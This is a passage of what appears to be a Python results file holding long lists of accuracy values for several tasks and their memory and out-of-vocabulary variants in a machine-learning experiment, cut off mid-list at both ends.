0.6835921536575399, 0.6835921536575399, 0.6835921536575399, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6837964854924398, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 
0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6918675929709849, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6945239068246832, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6810380057212914, 0.6920719248058848, 0.6920719248058848, 0.6929914180629342, 0.6929914180629342, 
0.6929914180629342]
# Task 4
# y4 = [0.2858776443682104, 0.5763293310463122, 0.5754716981132075, 0.5840480274442539, 0.5897655803316181, 0.6057747284162378, 0.6134934248141796, 0.614065180102916, 0.6406518010291595, 0.6552315608919382, 0.6761006289308176, 0.6946826758147513, 0.7149799885648942, 0.7355631789594054, 0.7504288164665524, 0.7747284162378502, 0.7827329902801601, 0.8047455688965123, 0.8176100628930818, 0.8207547169811321, 0.839622641509434, 0.8453401943967982, 0.8647798742138365, 0.8653516295025729, 0.8653516295025729, 0.8793596340766152, 0.8790737564322469, 0.8916523727844483, 0.8990851915380217, 0.8999428244711264, 0.8999428244711264, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9105202973127502, 0.9179531160663236, 0.9179531160663236, 0.9179531160663236, 0.9205260148656375, 0.9205260148656375, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9248141795311606, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9242424242424242, 0.9268153230417381, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 
0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9282447112635792, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 0.9316752429959977, 
0.9316752429959977]
# y4_Mem = [0.25718608169440244, 0.3751001156892409, 0.46551570703924533, 0.5311915991812761, 0.5939307644389071, 0.6496395835187327, 0.685948206816766, 0.7067722701788733, 0.7151374922132242, 0.7330248286909318, 0.7426359348580582, 0.7528699830915725, 0.7679985761324197, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7734270712823708, 0.7791225416036308, 0.7791225416036308, 0.7791225416036308, 0.7791225416036308, 0.7849959953724304, 0.7846400284773516, 0.7893565898371452, 0.7929162587879327, 0.7934502091305509, 0.7934502091305509, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7952300436059446, 0.7968318946337991, 0.7968318946337991, 0.7968318946337991, 0.8028833318501379, 0.8028833318501379, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 
0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.7964759277387203, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8023493815075198, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 0.8051971166681499, 
0.8051971166681499]
# y4_mem_oov = [0.5022792022792023, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 
0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 0.5698005698005698, 
0.5698005698005698]
# Task 5
# y5 = [0.5883791716490923, 0.6328405261441461, 0.6544189585824546, 0.6872486139797804, 0.7207305141863246, 0.7477986737688879, 0.7831286009348842, 0.8062289379280356, 0.8190564191759974, 0.8195999565170127, 0.8360147842156757, 0.8504728774866833, 0.8568866181106642, 0.8568866181106642, 0.8568866181106642, 0.8568866181106642, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8638982498097619, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8680291336014784, 0.8654745080987064, 0.8654745080987064, 0.866561582780737, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8659636917056202, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8663441678443309, 0.8667246439830416, 0.8667246439830416, 0.8667246439830416, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8734645070116317, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8725948472660072, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 
0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 0.8753125339710838, 
0.8753125339710838]
# y5_Mem = [0.6921948037830199, 0.80106533318839, 0.8487335579954343, 0.8811283835199478, 0.9046635503859115, 0.927165996303946, 0.938688987933471, 0.9478204152625286, 0.955212523100337, 0.9604848353081856, 0.9694532014349386, 0.43689531470812043, 0.4256984454832047, 0.40123926513751496, 0.43309055332101315, 0.45548429177084465, 0.4885857158386781, 0.5288618328079139, 0.5393521034895097, 0.5756603978693337, 0.5731057723665616, 0.5857701924122187, 0.5798999891292532, 0.5764757038808566, 0.9740732688335688, 0.9740732688335688, 0.9783128600934884, 0.980921839330362, 0.9829872812262203, 0.9848353081856723, 0.9858680291336015, 0.9871181650179367, 0.989183606913795, 0.9914121100119578, 0.9914121100119578, 0.9914664637460594, 0.9927709533644962, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9934775519078161, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9921730622893793, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 
0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9933144907055115, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9924448309598869, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9940210892488314, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 0.9942928579193391, 
0.9942928579193391]
# y5_mem_oov = [0.5905923344947736, 0.6024608013937283, 0.6048562717770035, 0.6070339721254355, 0.5988131533101045, 0.6033863240418118, 0.5970709930313589, 0.584168118466899, 0.6035496515679443, 0.5953288327526133, 0.5976154181184669, 0.600065331010453, 0.6026241289198606, 0.5992486933797909, 0.5983231707317073, 0.5983231707317073, 0.5960365853658537, 0.586345818815331, 0.586345818815331, 0.5932600174216028, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.6010452961672473, 0.5965265679442509, 0.5991398083623694, 0.5991398083623694, 0.5974520905923345, 0.5974520905923345, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.6001742160278746, 0.6001742160278746, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.5939677700348432, 0.6000108885017421, 0.6000108885017421, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 
0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.5996297909407665, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.6003919860627178, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5966898954703833, 0.5973432055749129, 0.5973432055749129, 0.5973432055749129, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5963087979094077, 
0.5963087979094077]
# Task 6
# y6 = [0.21260122808578802, 0.2588769244460265, 0.31129304974637356, 0.31583162765862777, 0.4743258876924446, 0.48972145590460087, 0.5092996351339325, 0.5359081605410697, 0.5369760612263059, 0.5505917949630684, 0.561893743881819, 0.5632286197383644, 0.5834297410340838, 0.5819168817299991, 0.5932188306487497, 0.5978464002847735, 0.5972234582183857, 0.6168016374477173, 0.6123520512592329, 0.6145768443534751, 0.6214292070837412, 0.6269466939574619, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6285485449853163, 0.629527453946783, 0.6371807421909762, 0.6338880484114977, 0.6338880484114977, 0.6338880484114977, 0.6370027587434368, 0.6370027587434368, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6483047076621874, 0.6483047076621874, 0.6475037821482602, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 
0.6460799145679452, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 